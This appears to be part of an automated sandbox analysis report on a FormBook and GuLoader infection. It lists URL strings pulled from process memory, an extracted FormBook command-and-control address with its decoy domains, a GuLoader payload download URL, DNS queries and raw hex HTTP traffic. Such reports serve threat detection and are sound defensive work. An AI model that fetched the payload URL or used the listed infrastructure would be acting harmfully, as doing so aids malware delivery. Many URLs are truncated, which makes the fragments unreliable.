Source: explorer.exe, 0000001C.00000000.2202119601.00000000046E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1865992376.00000000046E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1718861114.00000000046E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1787443829.00000000046E2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://purlorg/dc/elements/1.1/
Source: explorer.exe, 0000001C.00000000.2218425440.000000000A580000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.1715282286.0000000003060000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.2218349968.000000000A530000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: powershell.exe, 0000000D.00000002.1783849096.0000000005091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: chkdsk.exe, 00000020.00000002.5743432574.0000000008260000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5743723179.0000000008280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.dujh.xyz/
Source: chkdsk.exe, 00000020.00000002.5743723179.0000000008280000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5743515367.0000000008264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.dujh.xyz/wn19/?AVnXAh=a63aDXt/KdVd8/vhoA3n5O0XH1EsSnoV0YHdqlzRS6BKHLBCb088tgqJ
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.foreca.com
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.linqxw.com
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.linqxw.com/Accident_Lawyers.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJX
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.linqxw.com/Contact_Lens.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.linqxw.com/Designer_Apparel.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJX
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.linqxw.com/Healthy_Weight_Loss.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSy
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.linqxw.com/Work_from_Home.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.linqxw.com/display.cfm
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.linqxw.com/find_a_tutor.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.linqxw.com/px.js?ch=1
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.linqxw.com/px.js?ch=2
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.linqxw.com/sk-logabpstatus.php?a=endjMmRmQ2JsNGxkU0gxbkFJUVVyVlRxZ1c3ZnhHTGFGdFNIOFdpSjRR
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.linqxw.com/song_lyrics.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%2
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.linqxw.com/wn19/?AVnXAh=041CpAoA8aE4nytHYFLnZX
Source: explorer.exe, 0000001C.00000000.2231797627.000000000D823000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 0000001C.00000000.1796519211.00000000095D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1726283312.00000000095D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1874472316.00000000095D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2211492035.00000000095D6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirm%
Source: powershell.exe, 0000000D.00000002.1783849096.0000000005091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB2l
Source: explorer.exe, 0000001C.00000000.2230893917.000000000D686000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000001C.00000000.1715343001.0000000003070000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1861899540.0000000003070000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2198385462.0000000003070000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000001C.00000000.2244298074.000000000F6D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1907825476.000000000F6D7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1831648228.000000000F683000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1754749899.000000000F683000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2243796340.000000000F683000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000002.1798789622.0000000005835000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: chkdsk.exe, 00000020.00000003.2181501980.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5728450040.0000000000A89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: chkdsk.exe, 00000020.00000003.2181501980.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5728450040.0000000000A89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: chkdsk.exe, 00000020.00000003.2181501980.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5728450040.0000000000A89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org0
Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.comjU
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 0000001C.00000000.2205065965.00000000050E0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/ClassId
Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1715827364.00000000030D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 0000001C.00000000.2207491239.000000000527A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/white-house-chaos-as-video-shows-joe-biden-aides-stop-report
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: FormBook {"C2 list": ["www.shantelleketodietofficial.site/wn19/"], "decoy": ["intelios.xyz", "fungismartgrid.com", "wrsngh.com", "golatrak.com", "revboxx.com", "projectduckling.com", "yiwuanyi.com", "bellaigo.com", "rnrr.xyz", "dentalimplantsservicelk.com", "helixsaleep.com", "hokasneakeruse.xyz", "threads34.store", "ayanaslifeinmalaysia.com", "thebeautystore.store", "99221.net", "mc3.xyz", "coconsj.store", "abstractmouse.com", "bctp.xyz", "sura.ooo", "paradisetrippielagoon.com", "usnahrpc.com", "kbcoastalproperties.com", "whiskeyjr.com", "liesdevocalist.store", "schnellekreditfinanz.com", "katraderphotography.com", "guizhouwentuo.com", "tfp3gfekbrb9cx99.xyz", "reionsbank.com", "edwardfran.com", "grigorous.com", "linqxw.com", "proplanvetsdirect.com", "zildaalckmin.net", "herbalsfixng.xyz", "gpusforfun.com", "terra-stations.money", "anytoearn.com", "borneadomicile.com", "dtmkwd.sbs", "taakyif.com", "perrobravostudio.com", "limba6lamb.xyz", "gluideline.com", "travelchanel3d.com", "group-gr.com", "qcrcmh.com", "dujh.xyz", "screensunshincoust.com", "cnrhome.com", "getsuzamtir.xyz", "baseballportalusa.com", "laiwu-yulu.com", "repaircilinic.com", "nelvashop.com", "2228.wtf", "clickleaser.com", "jpfzaojyn.sbs", "tandelawnmaintenance.com", "actu-infomail.com", "m-a-a.xyz", "friendlyneighborholdings.com"]}
Source: 0000000D.00000002.1828222321.0000000009C70000.00000040.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "http://barsam.com.au/bin_FCWtLoO90.bin"}

Source:	DNS query: www.dujh.xyz
Source:	DNS query: www.dujh.xyz
Source:	DNS query: www.getsuzamtir.xyz

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 837Connection: closeDate: Tue, 10 May 2022 12:25:21 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta c
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 10 May 2022 12:25:23 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~\|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 May 2022 12:26:24 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.clickleaser.com/wp-json/>; rel="https://api.w.org/"Vary: User-AgentConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 63 64 6e 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 27 20 2f 3e 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 43 6c 69 63 6b 20 4c 65 61 73 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 61 70 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 